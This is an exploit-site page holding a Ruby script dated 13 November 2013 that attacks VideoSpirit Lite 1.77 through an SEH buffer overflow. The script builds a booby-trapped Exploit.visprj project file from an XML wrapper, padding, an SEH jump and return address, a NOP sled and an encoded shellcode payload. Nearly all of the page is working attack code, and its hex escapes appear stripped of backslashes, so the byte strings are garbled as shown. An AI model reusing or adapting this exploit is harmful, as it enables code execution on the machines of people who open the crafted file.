Home / exploits VideoSpirit Lite 1.77 SEH Buffer Overflow
Posted on 13 November 2013
#!/usr/bin/ruby #Vendor: http://www.verytools.com/ #Software link: http://www.verytools.com/videospirit/download.html print ''' VideoSpirit Lite 1.77 Seh Buffer Overflow Version: Lite 1.77 Date found: 11.11.2013 Exploit Author: metacom Tested on: Win7-Win8-EN ''' sleep(3) head=("x3Cx76x65x72x73x69x6Fx6Ex20x76x61x6Cx75x65x3Dx22x33x22x20"+ "x2Fx3Ex0Ax3Cx74x72x61x63x6Bx3Ex0Ax20x20x20x20x3Cx74x79x70"+ "x65x20x76x61x6Cx75x65x3Dx22x30x22x20x2Fx3Ex0Ax20x20x20x20"+ "x3Cx74x79x70x65x20x76x61x6Cx75x65x3Dx22x34x22x20x2Fx3Ex0A"+ "x20x20x20x20x3Cx74x79x70x65x20x76x61x6Cx75x65x3Dx22x32x22"+ "x20x2Fx3Ex0Ax20x20x20x20x3Cx74x79x70x65x20x76x61x6Cx75x65"+ "x3Dx22x31x22x20x2Fx3Ex0Ax20x20x20x20x3Cx74x79x70x65x20x76"+ "x61x6Cx75x65x3Dx22x37x22x20x2Fx3Ex0Ax3Cx2Fx74x72x61x63x6B"+ "x3Ex0Ax3Cx74x72x61x63x6Bx30x20x2Fx3Ex0Ax3Cx74x72x61x63x6B"+ "x31x20x2Fx3Ex0Ax3Cx74x72x61x63x6Bx32x20x2Fx3Ex0Ax3Cx74x72"+ "x61x63x6Bx33x20x2Fx3Ex0Ax3Cx74x72x61x63x6Bx34x20x2Fx3Ex0A"+ "x3Cx63x6Cx69x70x20x2Fx3Ex0Ax3Cx6Fx75x74x70x75x74x20x74x79"+ "x70x65x6Ex61x6Dx65x3Dx22x41x56x49x22x20x6Bx65x65x70x61x73"+ "x70x65x63x74x3Dx22x30x22x20x70x72x65x73x65x74x71x75x61x6C"+ "x69x74x79x3Dx22x30x22x3Ex0Ax20x20x20x20x3Cx74x79x70x65x30"+ "x20x65x6Ex61x62x6Cx65x3Dx22x31x22x3Ex0Ax20x20x20x20x20x20"+ "x20x20x3Cx76x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22x6Dx73"+ "x6Dx70x65x67x34x76x32x22x20x76x61x6Cx75x65x3Dx22x6Dx73x6D"+ "x70x65x67x34x76x32x22x20x2Fx3Ex0Ax20x20x20x20x20x20x20x20"+ "x3Cx76x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22x33x32x30x2A"+ "x32x34x30x28x34x3Ax33x29x22x20x76x61x6Cx75x65x3Dx22x33x32"+ "x30x2Ax32x34x30x22x20x2Fx3Ex0Ax20x20x20x20x20x20x20x20x3C"+ "x76x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22x33x30x22x20x76"+ "x61x6Cx75x65x3Dx22x33x30x22x20x2Fx3Ex0Ax20x20x20x20x20x20"+ "x20x20x3Cx76x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22x31x36"+ "x30x30x30x6Bx22x20x76x61x6Cx75x65x3Dx22x31x36x30x30x30x6B"+ "x22x20x2Fx3Ex0Ax20x20x20x20x3Cx2Fx74x79x70x65x30x3Ex0Ax20"+ "x20x20x20x3Cx74x79x70x65x31x20x65x6Ex61x62x6Cx65x3Dx22x31"+ "x22x3Ex0Ax20x20x20x20x20x20x20x20x3Cx76x61x6Cx69x74x65x6D"+ "x20x6Ex61x6Dx65x3Dx22x6Dx70x33x22x20x76x61x6Cx75x65x3Dx22") buffer="x41" * 104 buffer+="xebx0cxffxff" # jump buffer+=[0x1008667f].pack('V')# 0x1008667f buffer+="x90" * 80 # landing zone buffer+=("xb8xb8xd3x62x62xd9xcfxd9x74x24xf4x5ax31xc9xb1"+ "x33x83xeaxfcx31x42x0ex03xfaxddx80x97x06x09xcd"+ "x58xf6xcaxaexd1x13xfbxfcx86x50xaex30xccx34x43"+ "xbax80xacxd0xcex0cxc3x51x64x6bxeax62x48xb3xa0"+ "xa1xcax4fxbaxf5x2cx71x75x08x2cxb6x6bxe3x7cx6f"+ "xe0x56x91x04xb4x6ax90xcaxb3xd3xeax6fx03xa7x40"+ # Bad Characters "x71x53x18xdex39x4bx12xb8x99x6axf7xdaxe6x25x7c"+ # x00x0ax0dx1ax21x22x26 "x28x9cxb4x54x60x5dx87x98x2fx60x28x15x31xa4x8e"+ "xc6x44xdexedx7bx5fx25x8cxa7xeaxb8x36x23x4cx19"+ "xc7xe0x0bxeaxcbx4dx5fxb4xcfx50x8cxcexebxd9x33"+ "x01x7ax99x17x85x27x79x39x9cx8dx2cx46xfex69x90"+ "xe2x74x9bxc5x95xd6xf1x18x17x6dxbcx1bx27x6exee"+ "x73x16xe5x61x03xa7x2cxc6xfbxedx6dx6ex94xabxe7"+ "x33xf9x4bxd2x77x04xc8xd7x07xf3xd0x9dx02xbfx56"+ "x4dx7exd0x32x71x2dxd1x16x12xb0x41xfaxfbx57xe2"+ "x99x03") buffer+="xCC" * 4500 footer=("x22x20x2Fx3Ex0Ax20x20x20x20x20x20x20x20x3Cx76x61x6Cx69x74x65"+ "x6Dx20x6Ex61x6Dx65x3Dx22x31x32x38x6Bx22x20x76x61x6Cx75x65x3D"+ "x22x31x32x38x6Bx22x20x2Fx3Ex0Ax20x20x20x20x20x20x20x20x3Cx76"+ "x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22x34x34x31x30x30x22x20"+ "x76x61x6Cx75x65x3Dx22x34x34x31x30x30x22x20x2Fx3Ex0Ax20x20x20"+ "x20x20x20x20x20x3Cx76x61x6Cx69x74x65x6Dx20x6Ex61x6Dx65x3Dx22"+ "x32x20x28x53x74x65x72x65x6Fx29x22x20x76x61x6Cx75x65x3Dx22x32"+ "x22x20x2Fx3Ex0Ax20x20x20x20x3Cx2Fx74x79x70x65x31x3Ex0Ax20x20"+ "x20x20x3Cx74x79x70x65x32x20x65x6Ex61x62x6Cx65x3Dx22x30x22x20"+ "x2Fx3Ex0Ax3Cx2Fx6Fx75x74x70x75x74x3E") off= head + buffer + footer print " [+]Creating Exploit File... " sleep(1) begin File.open("Exploit.visprj","wb") do |f| f.write off f.close print " [+]File Exploit.visprj create successfully. " sleep(1) end rescue print "**[-]Error: #{$!} " exit(0) end
